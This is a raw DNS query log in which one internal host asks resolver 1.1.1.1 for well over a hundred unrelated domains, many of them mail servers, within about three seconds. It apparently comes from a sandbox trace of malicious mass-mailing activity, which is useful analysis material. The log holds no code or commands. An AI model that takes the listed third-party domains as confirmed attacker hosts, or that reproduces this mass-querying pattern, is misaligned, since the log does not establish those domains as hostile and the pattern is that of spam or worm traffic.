                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.326442003 CEST192.168.2.31.1.1.10x4eStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.326795101 CEST192.168.2.31.1.1.10xdf30Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.327161074 CEST192.168.2.31.1.1.10xb66Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.327236891 CEST192.168.2.31.1.1.10xcfbbStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.327603102 CEST192.168.2.31.1.1.10x5e3dStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.327708006 CEST192.168.2.31.1.1.10xb6fbStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.328085899 CEST192.168.2.31.1.1.10x39f6Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.328175068 CEST192.168.2.31.1.1.10x9040Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.529685974 CEST192.168.2.31.1.1.10xb286Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.539865017 CEST192.168.2.31.1.1.10xa0b7Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.543291092 CEST192.168.2.31.1.1.10x9dcbStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.544611931 CEST192.168.2.31.1.1.10xe050Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.545018911 CEST192.168.2.31.1.1.10xe1c6Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.557991028 CEST192.168.2.31.1.1.10xac88Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.689207077 CEST192.168.2.31.1.1.10x5ff8Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.689271927 CEST192.168.2.31.1.1.10x8105Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.689682007 CEST192.168.2.31.1.1.10x9591Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.689882994 CEST192.168.2.31.1.1.10x670eStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.689958096 CEST192.168.2.31.1.1.10x5f2eStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.690135002 CEST192.168.2.31.1.1.10xa6a2Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.691888094 CEST192.168.2.31.1.1.10x3420Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.692771912 CEST192.168.2.31.1.1.10xdadaStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.693614006 CEST192.168.2.31.1.1.10xc46bStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.695370913 CEST192.168.2.31.1.1.10x4634Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.725188971 CEST192.168.2.31.1.1.10xb2a1Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.731992960 CEST192.168.2.31.1.1.10x77c1Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.783875942 CEST192.168.2.31.1.1.10xe2a4Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.784771919 CEST192.168.2.31.1.1.10x9b69Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.785135984 CEST192.168.2.31.1.1.10x78b6Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.787152052 CEST192.168.2.31.1.1.10x5b2cStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.800026894 CEST192.168.2.31.1.1.10xba33Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.817007065 CEST192.168.2.31.1.1.10x307dStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.818703890 CEST192.168.2.31.1.1.10xda03Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.825148106 CEST192.168.2.31.1.1.10xdd85Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.825481892 CEST192.168.2.31.1.1.10xb084Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.827502966 CEST192.168.2.31.1.1.10xdbe6Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.830410004 CEST192.168.2.31.1.1.10x44bfStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.910013914 CEST192.168.2.31.1.1.10x8b8cStandard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.984036922 CEST192.168.2.31.1.1.10xd967Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.985572100 CEST192.168.2.31.1.1.10x5027Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.004542112 CEST192.168.2.31.1.1.10xf5ecStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.050462008 CEST192.168.2.31.1.1.10x2644Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.110420942 CEST192.168.2.31.1.1.10x4715Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.134660959 CEST192.168.2.31.1.1.10x157eStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.135776043 CEST192.168.2.31.1.1.10x9052Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.136497021 CEST192.168.2.31.1.1.10x887fStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.137053967 CEST192.168.2.31.1.1.10x2985Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.137538910 CEST192.168.2.31.1.1.10x7ebStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.141604900 CEST192.168.2.31.1.1.10x26c1Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.144773960 CEST192.168.2.31.1.1.10xfb46Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.153414011 CEST192.168.2.31.1.1.10x36afStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.222316980 CEST192.168.2.31.1.1.10xd775Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.222743988 CEST192.168.2.31.1.1.10x506Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.223356962 CEST192.168.2.31.1.1.10x5124Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.223591089 CEST192.168.2.31.1.1.10x2aa4Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.232808113 CEST192.168.2.31.1.1.10xf2f7Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.241333008 CEST192.168.2.31.1.1.10x4ab3Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.243844986 CEST192.168.2.31.1.1.10x9de4Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.244808912 CEST192.168.2.31.1.1.10xa75cStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.245299101 CEST192.168.2.31.1.1.10x9136Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.245870113 CEST192.168.2.31.1.1.10x9b26Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.246360064 CEST192.168.2.31.1.1.10xedccStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.266231060 CEST192.168.2.31.1.1.10x7123Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.274430990 CEST192.168.2.31.1.1.10x677eStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.337901115 CEST192.168.2.31.1.1.10x4eStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.384912014 CEST192.168.2.31.1.1.10xabdStandard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.385308981 CEST192.168.2.31.1.1.10x2f0dStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.387151957 CEST192.168.2.31.1.1.10x64b7Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.406346083 CEST192.168.2.31.1.1.10x75bbStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.407787085 CEST192.168.2.31.1.1.10x1060Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.409307003 CEST192.168.2.31.1.1.10x8645Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.421546936 CEST192.168.2.31.1.1.10x9db8Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.468174934 CEST192.168.2.31.1.1.10x24a5Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.497963905 CEST192.168.2.31.1.1.10x3414Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.502660990 CEST192.168.2.31.1.1.10xf46Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.503761053 CEST192.168.2.31.1.1.10xed53Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.503864050 CEST192.168.2.31.1.1.10x552aStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.504770994 CEST192.168.2.31.1.1.10xde2eStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.506721973 CEST192.168.2.31.1.1.10xe636Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.507020950 CEST192.168.2.31.1.1.10xcaffStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.508821011 CEST192.168.2.31.1.1.10x79e8Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.509421110 CEST192.168.2.31.1.1.10xc5a0Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.510039091 CEST192.168.2.31.1.1.10x5a17Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.512309074 CEST192.168.2.31.1.1.10x2309Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.515320063 CEST192.168.2.31.1.1.10xe729Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.535007000 CEST192.168.2.31.1.1.10x650eStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.543858051 CEST192.168.2.31.1.1.10xe1c6Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.597148895 CEST192.168.2.31.1.1.10x3e84Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.610776901 CEST192.168.2.31.1.1.10x8101Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.657192945 CEST192.168.2.31.1.1.10x7a5eStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.658343077 CEST192.168.2.31.1.1.10x3a42Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.662578106 CEST192.168.2.31.1.1.10x31d7Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.680746078 CEST192.168.2.31.1.1.10xa012Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.690633059 CEST192.168.2.31.1.1.10x375eStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.700560093 CEST192.168.2.31.1.1.10xb7f6Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.703345060 CEST192.168.2.31.1.1.10x1284Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.706904888 CEST192.168.2.31.1.1.10x6ddcStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.796636105 CEST192.168.2.31.1.1.10x656cStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.818851948 CEST192.168.2.31.1.1.10xce2eStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.821651936 CEST192.168.2.31.1.1.10xb67dStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.868650913 CEST192.168.2.31.1.1.10x7eb2Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.891190052 CEST192.168.2.31.1.1.10x30f3Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.928961992 CEST192.168.2.31.1.1.10x4293Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.942034960 CEST192.168.2.31.1.1.10x5aacStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.966483116 CEST192.168.2.31.1.1.10x22b8Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.984534979 CEST192.168.2.31.1.1.10x8af4Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.047301054 CEST192.168.2.31.1.1.10x4406Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.049941063 CEST192.168.2.31.1.1.10x2e84Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.077215910 CEST192.168.2.31.1.1.10xe056Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.078803062 CEST192.168.2.31.1.1.10x1a13Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.080295086 CEST192.168.2.31.1.1.10x9b82Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.112987995 CEST192.168.2.31.1.1.10xa6deStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.137159109 CEST192.168.2.31.1.1.10xc5baStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.137985945 CEST192.168.2.31.1.1.10x42bfStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.147443056 CEST192.168.2.31.1.1.10x7d7eStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.153286934 CEST192.168.2.31.1.1.10x7ebStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.171525955 CEST192.168.2.31.1.1.10x6fb5Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.189282894 CEST192.168.2.31.1.1.10xa957Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.222157001 CEST192.168.2.31.1.1.10xd775Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.236550093 CEST192.168.2.31.1.1.10x7650Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.261115074 CEST192.168.2.31.1.1.10xd4afStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.283898115 CEST192.168.2.31.1.1.10x14b6Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.289467096 CEST192.168.2.31.1.1.10xab5cStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.297636032 CEST192.168.2.31.1.1.10x1a8Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.346658945 CEST192.168.2.31.1.1.10x4eStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.352277040 CEST192.168.2.31.1.1.10x8753Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.363712072 CEST192.168.2.31.1.1.10xf97eStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.390034914 CEST192.168.2.31.1.1.10xbf07Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.429406881 CEST192.168.2.31.1.1.10x408fStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.429702997 CEST192.168.2.31.1.1.10xb351Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.456172943 CEST192.168.2.31.1.1.10xc4ebStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.458467960 CEST192.168.2.31.1.1.10x2b3aStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.503989935 CEST192.168.2.31.1.1.10xf510Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.509417057 CEST192.168.2.31.1.1.10x14f1Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.519989014 CEST192.168.2.31.1.1.10x8946Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.611232996 CEST192.168.2.31.1.1.10x5d6Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.611232996 CEST192.168.2.31.1.1.10xc5eeStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.701708078 CEST192.168.2.31.1.1.10xb7f6Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.703264952 CEST192.168.2.31.1.1.10xc34Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.706675053 CEST192.168.2.31.1.1.10xc498Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.713258982 CEST192.168.2.31.1.1.10x9898Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.732376099 CEST192.168.2.31.1.1.10x77c1Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.753277063 CEST192.168.2.31.1.1.10x8436Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.765789986 CEST192.168.2.31.1.1.10xbd4Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.825275898 CEST192.168.2.31.1.1.10xce2eStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.832894087 CEST192.168.2.31.1.1.10xba92Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.843075037 CEST192.168.2.31.1.1.10x20a6Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.845212936 CEST192.168.2.31.1.1.10xa309Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.906388998 CEST192.168.2.31.1.1.10x8161Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.931629896 CEST192.168.2.31.1.1.10x13e8Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.934443951 CEST192.168.2.31.1.1.10x4293Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.938900948 CEST192.168.2.31.1.1.10x3d4dStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.939472914 CEST192.168.2.31.1.1.10x19d0Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.985006094 CEST192.168.2.31.1.1.10x8ce6Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.044358969 CEST192.168.2.31.1.1.10x2e84Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.048553944 CEST192.168.2.31.1.1.10xc001Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.069888115 CEST192.168.2.31.1.1.10x9862Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.141117096 CEST192.168.2.31.1.1.10x14e6Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.161407948 CEST192.168.2.31.1.1.10x71a2Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.167817116 CEST192.168.2.31.1.1.10xbf6bStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.168237925 CEST192.168.2.31.1.1.10x1696Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.215943098 CEST192.168.2.31.1.1.10xd775Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.216835976 CEST192.168.2.31.1.1.10x2df1Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.518793106 CEST192.168.2.31.1.1.10x1e68Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.536128044 CEST192.168.2.31.1.1.10xa18fStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.649069071 CEST192.168.2.31.1.1.10x94d5Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.677314043 CEST192.168.2.31.1.1.10xdd3bStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.718935966 CEST192.168.2.31.1.1.10xb7f6Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.720335960 CEST192.168.2.31.1.1.10xc498Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.767263889 CEST192.168.2.31.1.1.10x206fStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.816139936 CEST192.168.2.31.1.1.10xadf2Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.828640938 CEST192.168.2.31.1.1.10x5fd1Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.833127975 CEST192.168.2.31.1.1.10x8c2aStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.845778942 CEST192.168.2.31.1.1.10x2f62Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.870008945 CEST192.168.2.31.1.1.10x5bbStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
